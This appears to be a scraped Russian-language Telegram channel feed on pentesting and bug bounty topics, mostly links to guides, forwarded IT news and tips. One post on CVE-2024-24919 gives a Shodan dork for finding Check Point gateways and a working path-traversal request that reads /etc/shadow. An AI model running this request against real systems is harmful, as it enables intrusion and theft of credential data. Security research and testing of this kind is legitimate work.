Please open Telegram to view this post
VIEW IN TELEGRAM
phdays.com
Positive Hack Days
An international cyberfestival for those who want to dive into the world of cybersecurity and have a great time
👾2
📌 Подробная шпаргалка по поиску и эксплуатации SQL-инъекций, которая должна быть в ваших закладках.
👉 Перейти к шпаргалке
#cheatsheet
👉 Перейти к шпаргалке
#cheatsheet
👍7🔥1
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍4
Измените тип контента с application/json на text/plain и посмотрите, принимает ли он по-прежнему запрос 🥷
#bugbounty #tips
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥3
🥷 Пентест gRPC: гайд для этичного хакера
Гайд поможет разобраться в том, как тестировать веб-приложения, использующие gRPC. Содержание частично пересекается с докладом автора на OFFZONE 2023, но с упором на практический пример по поиску уязвимостей на демонстрационном стенде с использованием Burp Suite и расширения prototbuf-magic.
👉 Читать
#pentest #bugbounty
Гайд поможет разобраться в том, как тестировать веб-приложения, использующие gRPC. Содержание частично пересекается с докладом автора на OFFZONE 2023, но с упором на практический пример по поиску уязвимостей на демонстрационном стенде с использованием Burp Suite и расширения prototbuf-magic.
👉 Читать
#pentest #bugbounty
Forwarded from Библиотека дата-сайентиста | Data Science, Machine learning, анализ данных, машинное обучение
💸📊 На сколько просели зарплаты в ИТ в 2024 году?
Благодаря открытым данным с сайта Хабр Карьера мы узнали, какие основные тенденции ждать в зарплатном секторе, и сколько получают ИТ-специалисты сейчас.
🤔 Например, в первом полугодии 2023 года в среднем джунам предлагали 80 тысяч рублей, а спустя год это число упало до 72,5 тысячи рублей.
👉 Остальные данные — в статье
👉 Зеркало
Благодаря открытым данным с сайта Хабр Карьера мы узнали, какие основные тенденции ждать в зарплатном секторе, и сколько получают ИТ-специалисты сейчас.
🤔 Например, в первом полугодии 2023 года в среднем джунам предлагали 80 тысяч рублей, а спустя год это число упало до 72,5 тысячи рублей.
👉 Остальные данные — в статье
👉 Зеркало
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6
🥷 Изучение необычных методов атаки на NTLM relay
Под катом вас ждет пять векторов атак на NTLM relay, о которых мало говорят:
1️⃣ Enumerating Domain Usernames via a Non-Admin SMB Relay
2️⃣ Relaying to Microsoft SQL Server
3️⃣ Relaying to LDAP and Configuring Resource-Based Delegation
4️⃣ Shadow Credentials Attack with no Prior Credentials
5️⃣ Shadow Credentials Attack Using Prior Credentials
#pentest #redteam
Под катом вас ждет пять векторов атак на NTLM relay, о которых мало говорят:
#pentest #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
GuidePoint Security
Beyond the Basics: Exploring Uncommon NTLM Relay Attack Techniques
Threat & Attack Simulation Technical Lead Kevin Murphy details 5 lesser-known NTLM relay attacks that have to help you penetration test your networks.
🔥2
Все пишут про CVE-2024-24919, и мы напишем.
🔍 Дорк для Shodan:
Эксплуатация👇
#CVE
title:"Check Point" ssl:"target"Эксплуатация👇
POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
#CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
Forwarded from Библиотека программиста | программирование, кодинг, разработка
🐳✈️ Docker ушёл из РФ! Инструкция по восстановлению доступа к Docker Hub для пользователей из России
Docker заблокировал доступ к своему главному репозиторию Docker Hub для пользователей из России. Однако есть способы обойти это ограничение и продолжить работу. В этом посте мы расскажем, как настроить альтернативные репозитории и зеркала.
🔗 Читать статью
🔗 Зеркало
Docker заблокировал доступ к своему главному репозиторию Docker Hub для пользователей из России. Однако есть способы обойти это ограничение и продолжить работу. В этом посте мы расскажем, как настроить альтернативные репозитории и зеркала.
🔗 Читать статью
🔗 Зеркало
🥱7❤2👍1😁1😢1
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8
Forwarded from Библиотека программиста | программирование, кодинг, разработка
💻⌛ 8 причин участвовать в хакатонах
Давно мечтали попробовать что-нибудь новое в своей жизни, но обойтись без экстремальных ощущений? Тогда хакатоны — это то, что вам нужно!
👉 Читать статью
👉 Зеркало
📌 Другие материалы по теме:
💻🚀🏰 Как мы создали ИИ-стартап на хакатоне выходного дня в Германии
🔥 12 признаков выгорания или как понять, что вам пора в отпуск
🏆 Как принять участие в хакатоне и занять призовое место. Инструкция для начинающих программистов
🤝 5 soft skills, которые помогут тебе дорасти до Senior-разработчика
Давно мечтали попробовать что-нибудь новое в своей жизни, но обойтись без экстремальных ощущений? Тогда хакатоны — это то, что вам нужно!
👉 Читать статью
👉 Зеркало
📌 Другие материалы по теме:
💻🚀🏰 Как мы создали ИИ-стартап на хакатоне выходного дня в Германии
🔥 12 признаков выгорания или как понять, что вам пора в отпуск
🏆 Как принять участие в хакатоне и занять призовое место. Инструкция для начинающих программистов
🤝 5 soft skills, которые помогут тебе дорасти до Senior-разработчика
❤2👍2🔥1
Исследователь из PortSwigger рассматривает новую технику эксплуатации, которую можно использовать для полной компрометации веб-приложения с помощью TRACE — древнего метода HTTP, который поддерживается более широко, чем вы думаете.
👉 Читать
#bugbounty #pentest #tools
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👍3
This media is not supported in your browser
VIEW IN TELEGRAM
#vim позволяет использовать любой разделитель регулярных выражений при замене шаблона.
Нет необходимости использовать
Это позволяет избежать экранирования символа
#tips
Нет необходимости использовать
/, попробуйте вместо этого #:
:s#/usr/local/bin#/usr/sbin#g
Это позволяет избежать экранирования символа
/.#tips
🔥5👍4
Вы узнаете, как:
☑️ Традиционные приложения полагались на отдельные файлы, получаемые с помощью HTTP-запросов, в то время как современные объединяют код в пакеты и используют API для создания динамического контента.
☑️ Мобильные приложения, IoT и веб-приложения взаимодействуют через API.
Кроме того, вы получите представление о 10 основных рисках безопасности API OWASP + ценные ресурсы для безопасной разработки API.
#pentest #bugbounty
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5🥱1
Обзор двух RCE, path traversal и memory leak от канала Bug Bounty Reports Explained. Кратко, ёмко и по делу👇
👀 Смотреть
#writeup #pentest #bugbounty
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6
Устраивает ли вас ваша зарплата?
Anonymous Poll
11%
Более чем
40%
Нет, не устраивает
19%
— Вот возьми, твоя зарплата. — Это же ветка?!
1%
Свой вариант (напишу в комментариях)
29%
Посмотреть результаты